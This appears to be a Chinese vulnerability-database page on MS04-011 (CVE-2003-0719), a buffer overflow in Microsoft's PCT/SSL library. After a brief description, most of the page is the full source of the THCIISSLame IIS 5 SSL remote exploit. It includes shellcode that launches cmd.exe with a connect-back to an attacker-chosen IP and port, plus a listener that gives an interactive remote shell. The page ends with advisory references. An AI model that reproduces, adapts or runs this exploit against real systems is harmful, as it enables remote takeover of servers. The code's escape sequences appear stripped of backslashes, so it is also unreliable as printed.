Microsoft PCT协议远程缓冲区溢出漏洞(MS04-011)

Microsoft PCT协议远程缓冲区溢出漏洞(MS04-011)

漏洞ID 1107893 漏洞类型 未知
发布时间 2004-04-21 更新时间 2005-10-20
图片[1]-Microsoft PCT协议远程缓冲区溢出漏洞(MS04-011)-安全小百科CVE编号 CVE-2003-0719
图片[2]-Microsoft PCT协议远程缓冲区溢出漏洞(MS04-011)-安全小百科CNNVD-ID CNNVD-200406-038
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200406-038
|漏洞详情
MicrosoftWindows是微软开发的操作系统。MicrosoftWindows实现的私有通信传输协议存在一个缓冲区溢出,远程攻击者可以利用这个漏洞对使用PCT协议的应用程序进行攻击,可能以系统进程权限执行任意指令。PCT协议是MicrosoftSSL库实现的,只有当SSL使能时或部分Windows2000控制域上存在此问题,成功利用此漏洞可控制整个系统。
|漏洞EXP
/*****************************************************************************/
/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit                           */
/* Exploit by: Johnny Cyberpunk ([email protected])                         */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                           */
/* Bug was found by Internet Security Systems                                */
/* Reversing credits of the bug go to Halvar Flake                           */
/*                                                                           */
/* compile with MS Visual C++ : cl THCIISSLame.c                             */
/*                                                                           */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
/* v0.2 - This little update uses a connectback shell !                      */
/* v0.1 - First release with portbinding shell on 31337                      */
/*                                                                           */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
/* scut, stealth, FtR and Random                                             */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper    "xebx0f"
#define greetings_to_microsoft "x54x48x43x4fx57x4ex5ax49x49x53x21"

char sslshit[] = "x80x62x01x02xbdx00x01x00x01x00x16x8fx82x01x00x00x00";

char shellcode[] =
"xebx25xe9xfax99xd3x77xf6x02x06x6cx59x6cx59xf8"
"x1dx9cxdex8cxd1x4cx70xd4x03x58x46x57x53x32x5f"
"x33x32x2ex44x4cx4cx01xebx05xe8xf9xffxffxffx5d"
"x83xedx2cx6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"
"xadx8bx78x08x8dx5fx3cx8bx1bx01xfbx8bx5bx78x01"
"xfbx8bx4bx1cx01xf9x8bx53x24x01xfax53x51x52x8b"
"x5bx20x01xfbx31xc9x41x31xc0x99x8bx34x8bx01xfe"
"xacx31xc2xd1xe2x84xc0x75xf7x0fxb6x45x09x8dx44"
"x45x08x66x39x10x75xe1x66x31x10x5ax58x5ex56x50"
"x52x2bx4ex10x41x0fxb7x0cx4ax8bx04x88x01xf8x0f"
"xb6x4dx09x89x44x8dxd8xfex4dx09x75xbexfex4dx08"
"x74x17xfex4dx24x8dx5dx1ax53xffxd0x89xc7x6ax02"
"x58x88x45x09x80x45x79x0cxebx82x50x8bx45x04x35"
"x93x93x93x93x89x45x04x66x8bx45x02x66x35x93x93"
"x66x89x45x02x58x89xcex31xdbx53x53x53x53x56x46"
"x56xffxd0x89xc7x55x58x66x89x30x6ax10x55x57xff"
"x55xe0x8dx45x88x50xffx55xe8x55x55xffx55xecx8d"
"x44x05x0cx94x53x68x2ex65x78x65x68x5cx63x6dx64"
"x94x31xd2x8dx45xccx94x57x57x57x53x53xfexcax01"
"xf2x52x94x8dx45x78x50x8dx45x88x50xb1x08x53x53"
"x6ax10xfexcex52x53x53x53x55xffx55xf0x6axffxff"
"x55xe4";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{  
  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
  unsigned char *badbuf,*p;
  unsigned long offset = 0x6741a1cd;
  unsigned long XOR = 0xffffffff;
  unsigned long XORIP = 0x93939393;
  unsigned short XORPORT = 0x9393;

  unsigned short cbport;
  unsigned long  cbip;

  struct sockaddr_in mytcp;
  struct hostent * hp;
  WSADATA wsaData;

  printf("nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploitn");
  printf("tested on Windows 2000 Server german/english SP4n");
  printf("by Johnny Cyberpunk ([email protected])n");

  if(argc<4 || argc>4)
   usage();

  badbuf = malloc(352);
  memset(badbuf,0,352);

  printf("n[*] building buffern");

  p = badbuf;

  memcpy(p,sslshit,sizeof(sslshit));

  p+=sizeof(sslshit)-1;
  
  strcat(p,jumper);

  strcat(p,greetings_to_microsoft);

  offset^=XOR;
  strncat(p,(unsigned char *)&offset,4);

  cbport = htons((unsigned short)atoi(argv[3]));
  cbip = inet_addr(argv[2]);
  cbport ^= XORPORT;
  cbip ^= XORIP;
  memcpy(&shellcode[2],&cbport,2);
  memcpy(&shellcode[4],&cbip,4);

  strcat(p,shellcode);
  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
  {
   printf("WSAStartup failed !n");
   exit(-1);
  }
  
  hp = gethostbyname(argv[1]);

  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp)  && (addr == INADDR_NONE) )
  {
   printf("Unable to resolve %sn",argv[1]);
   exit(-1);
  }

  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock)
  { 
   printf("socket() error...n");
   exit(-1);
  }
  
  if (hp != NULL)
   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
  else
   mytcp.sin_addr.s_addr = addr;

  if (hp)
   mytcp.sin_family = hp->h_addrtype;
  else
   mytcp.sin_family = AF_INET;

  mytcp.sin_port=htons(443);

  printf("[*] connecting the targetn");

  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
      send(sock,badbuf,351,0);
      printf("[*] exploit sendn");
  
      mytcp.sin_addr.s_addr = 0;
      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      
      rc=bind(sock2,(struct sockaddr *)&mytcp,16);
      if(rc!=0)
      {
       printf("bind error() %dn",WSAGetLastError());
       exit(-1);
      }
   
      rc=listen(sock2,1);
      if(rc!=0)
      {
       printf("listen error()n");
       exit(-1);
      }

      printf("[*] waiting for shelln");
      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 
      if(sock3)
      { 
       printf("[*] Exploit successful ! Have fun !n");
       printf("[*] --------------------------------------------------------------------nn");
       shell(sock3);
      }
  }
  else
  {
   printf("nCan't connect to ssl port 443!n");
   exit(-1);
  }
  
  shutdown(sock,1);
  closesocket(sock);
  shutdown(sock,2);
  closesocket(sock2);
  shutdown(sock,3);
  closesocket(sock3);

  free(badbuf);

  exit(0);
}
 
void usage()
{
 unsigned int a;
 printf("nUsage:  <victim-host> <connectback-ip> <connectback port>n");
 printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337nn");
 exit(0);
}

void shell(int sock)
{
 int l;
 char buf[1024];
 struct timeval time;
 unsigned long ul[2];

 time.tv_sec = 1;
 time.tv_usec = 0;

 while (1)
 {
  ul[0] = 1;
  ul[1] = sock;

  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
  if(l == 1)
  {  	
   l = recv (sock, buf, sizeof (buf), 0);
   if (l <= 0)
   {
    printf ("bye bye...n");
    return;
   }
  l = write (1, buf, l);
   if (l <= 0)
   {
    printf ("bye bye...n");
    return;
   }
  }
  else
  {
   l = read (0, buf, sizeof (buf));
   if (l <= 0)
   {
    printf("bye bye...n");
    return;
   }
   l = send(sock, buf, l, 0);
   if (l <= 0)
   {
    printf("bye bye...n");
    return;
   }
  }
 }
}

// milw0rm.com [2004-04-21]
|参考资料

来源:US-CERTVulnerabilityNote:VU#586540
名称:VU#586540
链接:http://www.kb.cert.org/vuls/id/586540
来源:US-CERTTechnicalAlert:TA04-104A
名称:TA04-104A
链接:http://www.us-cert.gov/cas/techalerts/TA04-104A.html
来源:ISS
名称:20040413MicrosoftSSLLibraryRemoteCompromiseVulnerability
链接:http://xforce.iss.net/xforce/alerts/id/168
来源:BUGTRAQ
名称:20040430AtechnicaldescriptionoftheSSLPCTvulnerability(CVE-2003-0719)
链接:http://www.securityfocus.com/archive/1/361836
来源:MS
名称:MS04-011
链接:http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
来源:USGovernmentResource:oval:org.mitre.oval:def:951
名称:oval:org.mitre.oval:def:951
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:951
来源:USGovernmentResource:oval:org.mitre.oval:def:903
名称:oval:org.mitre.oval:def:903
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:903
来源:USGovernmentResource:oval:org.mitre.oval:def:889
名称:oval:org.mitre.oval:def:889
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre

相关推荐: SecureAction Research Secure Network Messenger Remote Denial Of Service Vulnerability

SecureAction Research Secure Network Messenger Remote Denial Of Service Vulnerability 漏洞ID 1097719 漏洞类型 Failure to Handle Exceptio…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享